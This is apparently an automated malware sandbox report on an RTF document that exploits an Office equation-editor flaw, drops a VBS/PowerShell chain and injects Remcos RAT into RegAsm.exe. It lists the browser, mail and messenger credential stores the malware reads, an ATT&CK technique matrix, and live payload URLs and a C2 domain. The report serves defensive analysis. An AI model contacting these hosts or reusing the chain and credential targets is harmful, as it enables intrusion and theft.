              Source: Yara matchFile source: 00000008.00000002.381523200.0000000003729000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3596, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3728, type: MEMORYSTR
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data9_2_0040BA12
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\9_2_0040BB30
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \key3.db9_2_0040BB30
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccountJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULLJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULLJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULLJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULLJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\places.sqliteJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.dbJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cookies.sqliteJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.dbJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.dbJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45aJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4addJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: ESMTPPassword12_2_004033F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword12_2_00402DB3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword12_2_00402DB3
              Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3876, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-43JG4AJump to behavior
              Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.powershell.exe.3b90b60.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.powershell.exe.3b90b60.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000009.00000002.886651440.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.886651440.00000000008F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.381523200.0000000003729000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3596, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3728, type: MEMORYSTR
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: cmd.exe9_2_0040569A
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information111
              Scripting
              Valid Accounts11
              Native API
              111
              Scripting
              1
              DLL Side-Loading
              11
              Deobfuscate/Decode Files or Information
              2
              OS Credential Dumping
              2
              System Time Discovery
              Remote Services11
              Archive Collected Data
              13
              Ingress Tool Transfer
              Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts43
              Exploitation for Client Execution
              1
              DLL Side-Loading
              1
              Bypass User Account Control
              2
              Obfuscated Files or Information
              111
              Input Capture
              1
              Account Discovery
              Remote Desktop Protocol1
              Data from Local System
              21
              Encrypted Channel
              Exfiltration Over Bluetooth1
              Defacement
              Email AddressesDNS ServerDomain Accounts122
              Command and Scripting Interpreter
              1
              Windows Service
              1
              Access Token Manipulation
              1
              Install Root Certificate
              2
              Credentials in Registry
              1
              System Service Discovery
              SMB/Windows Admin Shares2
              Email Collection
              1
              Non-Standard Port
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              Service Execution
              Login Hook1
              Windows Service
              1
              DLL Side-Loading
              3
              Credentials In Files
              4
              File and Directory Discovery
              Distributed Component Object Model111
              Input Capture
              1
              Remote Access Software
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud Accounts3
              PowerShell
              Network Logon Script422
              Process Injection
              1
              Bypass User Account Control
              LSA Secrets38
              System Information Discovery
              SSH3
              Clipboard Data
              2
              Non-Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Masquerading
              Cached Domain Credentials3
              Security Software Discovery
              VNCGUI Input Capture213
              Application Layer Protocol
              Data Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Modify Registry
              DCSync21
              Virtualization/Sandbox Evasion
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
              Virtualization/Sandbox Evasion
              Proc Filesystem4
              Process Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
              Access Token Manipulation
              /etc/passwd and /etc/shadow1
              Application Window Discovery
              Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron422
              Process Injection
              Network Sniffing1
              System Owner/User Discovery
              Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
              Remote System Discovery
              Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 signatures2 2 Behavior Graph ID: 1526391 Sample: MKWbWHd5Ni.rtf Startdate: 05/10/2024 Architecture: WINDOWS Score: 100 53 Multi AV Scanner detection for domain / URL 2->53 55 Suricata IDS alerts for network traffic 2->55 57 Found malware configuration 2->57 59 20 other signatures 2->59 11 WINWORD.EXE 291 13 2->11         started        process3 process4 13 EQNEDT32.EXE 12 11->13         started        18 EQNEDT32.EXE 11->18         started        dnsIp5 45 51.83.251.113, 49165, 49167, 80 OVHFR France 13->45 41 C:\...\picturewithgetmebackgreatdayfo.vBS, Unicode 13->41 dropped 89 Office equation editor establishes network connection 13->89 91 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 13->91 20 wscript.exe 1 13->20         started        file6 signatures7 process8 signatures9 69 Suspicious powershell command line found 20->69 71 Wscript starts Powershell (via cmd or directly) 20->71 73 Bypasses PowerShell execution policy 20->73 75 2 other signatures 20->75 23 powershell.exe 4 20->23         started        process10 signatures11 77 Suspicious powershell command line found 23->77 79 Obfuscated command line found 23->79 81 Suspicious execution chain found 23->81 26 powershell.exe 12 5 23->26         started        process12 dnsIp13 43 raw.githubusercontent.com 185.199.111.133, 443, 49166 FASTLYUS Netherlands 26->43 83 Installs new ROOT certificates 26->83 85 Writes to foreign memory regions 26->85 87 Injects a PE file into a foreign processes 26->87 30 RegAsm.exe 3 10 26->30         started        signatures14 process15 dnsIp16 47 cavps7.duckdns.org 30->47 49 cavps7.duckdns.org 84.32.44.139, 1991, 49168, 49169 NTT-LT-ASLT Lithuania 30->49 51 geoplugin.net 178.237.33.50, 49172, 80 ATOM86-ASATOM86NL Netherlands 30->51 93 Contains functionality to bypass UAC (CMSTPLUA) 30->93 95 Detected Remcos RAT 30->95 97 Tries to steal Mail credentials (via file registry) 30->97 101 8 other signatures 30->101 34 RegAsm.exe 1 30->34         started        37 RegAsm.exe 1 30->37         started        39 RegAsm.exe 11 30->39         started        signatures17 99 Uses dynamic DNS services 47->99 process18 signatures19 61 Tries to steal Instant Messenger accounts or passwords 34->61 63 Tries to steal Mail credentials (via file / registry access) 34->63 65 Searches for Windows Mail specific files 34->65 67 Tries to harvest and steal browser information (history, passwords, etc) 37->67

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              MKWbWHd5Ni.rtf53%ReversingLabsDocument-RTF.Exploit.CVE-2017-11882
              MKWbWHd5Ni.rtf62%VirustotalBrowse
              MKWbWHd5Ni.rtf100%AviraHEUR/Rtf.Malformed
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              cavps7.duckdns.org8%VirustotalBrowse
              raw.githubusercontent.com0%VirustotalBrowse
              geoplugin.net0%VirustotalBrowse
              SourceDetectionScannerLabelLink
              http://www.imvu.comr0%URL Reputationsafe
              http://ocsp.entrust.net030%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
              https://deff.nelreports.net/api/report?cat=msn0%URL Reputationsafe
              http://go.micros0%URL Reputationsafe
              http://geoplugin.net/json.gp/C0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://nuget.org/nuget.exe0%URL Reputationsafe
              https://login.yahoo.com/config/login0%URL Reputationsafe
              http://ocsp.entrust.net0D0%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://crl.entrust.net/server1.crl00%URL Reputationsafe
              http://www.imvu.com0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              http://geoplugin.net/json.gp0%URL Reputationsafe
              https://secure.comodo.com/CPS00%URL Reputationsafe
              http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
              http://www.ebuddy.com0%URL Reputationsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              cavps7.duckdns.org
              84.32.44.139
              truetrueunknown
              raw.githubusercontent.com
              185.199.111.133
              truefalseunknown
              geoplugin.net
              178.237.33.50
              truefalseunknown
              NameMaliciousAntivirus DetectionReputation
              https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtfalse
                unknown
                cavps7.duckdns.orgtrue
                  unknown
                  http://geoplugin.net/json.gpfalse
                  • URL Reputation: safe
                  unknown
                  http://51.83.251.113/650/WERRFF.txttrue
                    unknown
                    http://51.83.251.113/650/picturewithgetmebackgreatdayfor.tIFtrue
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://b.scorecardresearch.com/beacon.jsbhvD26D.tmp.11.drfalse
                        unknown
                        http://acdn.adnxs.com/ast/ast.jsbhvD26D.tmp.11.drfalse
                          unknown
                          http://www.imvu.comrRegAsm.exe, 0000000D.00000002.388756607.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_bhvD26D.tmp.11.drfalse
                            unknown
                            http://ocsp.entrust.net03powershell.exe, 00000008.00000002.383299018.0000000005003000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1bhvD26D.tmp.11.drfalse
                              unknown
                              https://contoso.com/Licensepowershell.exe, 00000008.00000002.381523200.0000000003509000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://support.google.com/chrome/?p=plugin_flashRegAsm.exe, 0000000B.00000002.392677961.0000000002608000.00000004.00000020.00020000.00000000.sdmpfalse
                                unknown
                                http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.pngbhvD26D.tmp.11.drfalse
                                  unknown
                                  http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0powershell.exe, 00000008.00000002.383299018.0000000005003000.00000004.00000020.00020000.00000000.sdmpfalse
                                    unknown
                                    http://www.diginotar.nl/cps/pkioverheid0powershell.exe, 00000008.00000002.383299018.0000000005003000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9bhvD26D.tmp.11.drfalse
                                      unknown
                                      http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.htmlbhvD26D.tmp.11.drfalse
                                        unknown
                                        http://www.nirsoft.netRegAsm.exe, 0000000B.00000002.392273744.0000000000292000.00000004.00000010.00020000.00000000.sdmpfalse
                                          unknown
                                          https://deff.nelreports.net/api/report?cat=msnbhvD26D.tmp.11.drfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.jsbhvD26D.tmp.11.drfalse
                                            unknown
                                            http://go.microspowershell.exe, 00000008.00000002.380584613.0000000002C0A000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comRegAsm.exe, 0000000D.00000002.388756607.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                              unknown
                                              http://cache.btrll.com/default/Pix-1x1.gifbhvD26D.tmp.11.drfalse
                                                unknown
                                                http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683bhvD26D.tmp.11.drfalse
                                                  unknown
                                                  https://www.google.comRegAsm.exe, RegAsm.exe, 0000000D.00000002.388756607.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                    unknown
                                                    http://geoplugin.net/json.gp/Cpowershell.exe, 00000008.00000002.381523200.0000000003729000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://o.aolcdn.com/ads/adswrappermsni.jsbhvD26D.tmp.11.drfalse
                                                      unknown
                                                      http://cdn.taboola.com/libtrc/msn-home-network/loader.jsbhvD26D.tmp.11.drfalse
                                                        unknown
                                                        http://www.msn.com/?ocid=iehpbhvD26D.tmp.11.drfalse
                                                          unknown
                                                          https://contoso.com/powershell.exe, 00000008.00000002.381523200.0000000003509000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://nuget.org/nuget.exepowershell.exe, 00000008.00000002.381523200.0000000003509000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033bhvD26D.tmp.11.drfalse
                                                            unknown
                                                            http://static.chartbeat.com/js/chartbeat.jsbhvD26D.tmp.11.drfalse
                                                              unknown
                                                              http://www.msn.com/de-de/?ocid=iehpbhvD26D.tmp.11.drfalse
                                                                unknown
                                                                http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%bhvD26D.tmp.11.drfalse
                                                                  unknown
                                                                  https://login.yahoo.com/config/loginRegAsm.exefalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtsg1;powershell.exe, 00000008.00000002.380584613.0000000002619000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    http://www.nirsoft.net/RegAsm.exe, 0000000D.00000002.388756607.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                      unknown
                                                                      http://ocsp.entrust.net0Dpowershell.exe, 00000008.00000002.383299018.0000000005003000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000006.00000002.385646166.0000000002420000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.380584613.00000000024E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3bhvD26D.tmp.11.drfalse
                                                                        unknown
                                                                        http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683bhvD26D.tmp.11.drfalse
                                                                          unknown
                                                                          http://51.83.251.113powershell.exe, 00000008.00000002.380584613.000000000278E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(bhvD26D.tmp.11.drfalse
                                                                              unknown
                                                                              https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9bhvD26D.tmp.11.drfalse
                                                                                unknown
                                                                                http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_shbhvD26D.tmp.11.drfalse
                                                                                  unknown
                                                                                  http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.jsbhvD26D.tmp.11.drfalse
                                                                                    unknown
                                                                                    http://nuget.org/NuGet.exepowershell.exe, 00000008.00000002.381523200.0000000003509000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    https://www.ccleaner.com/go/app_cc_pro_trialkeybhvD26D.tmp.11.drfalse
                                                                                      unknown
                                                                                      http://crl.entrust.net/server1.crl0powershell.exe, 00000008.00000002.383299018.0000000005003000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      http://51.83.251.113/650/picturewithgetmebackgreatdayfor.tIFjEQNEDT32.EXE, 00000002.00000002.362310425.000000000062F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        unknown
                                                                                        https://contextual.media.net/8/nrrV73987.jsbhvD26D.tmp.11.drfalse
                                                                                          unknown
                                                                                          http://www.imvu.comRegAsm.exe, RegAsm.exe, 0000000D.00000002.388756607.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          https://contoso.com/Iconpowershell.exe, 00000008.00000002.381523200.0000000003509000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          https://contextual.media.net/bhvD26D.tmp.11.drfalse
                                                                                            unknown
                                                                                            http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.jsbhvD26D.tmp.11.drfalse
                                                                                              unknown
                                                                                              https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2bhvD26D.tmp.11.drfalse
                                                                                                unknown
                                                                                                http://www.msn.com/bhvD26D.tmp.11.drfalse
                                                                                                  unknown
                                                                                                  https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:aubhvD26D.tmp.11.drfalse
                                                                                                    unknown
                                                                                                    http://www.imvu.com/GKRegAsm.exe, 0000000D.00000002.388740433.000000000031C000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                      unknown
                                                                                                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl0powershell.exe, 00000008.00000002.383299018.0000000005003000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        unknown
                                                                                                        https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549bhvD26D.tmp.11.drfalse
                                                                                                          unknown
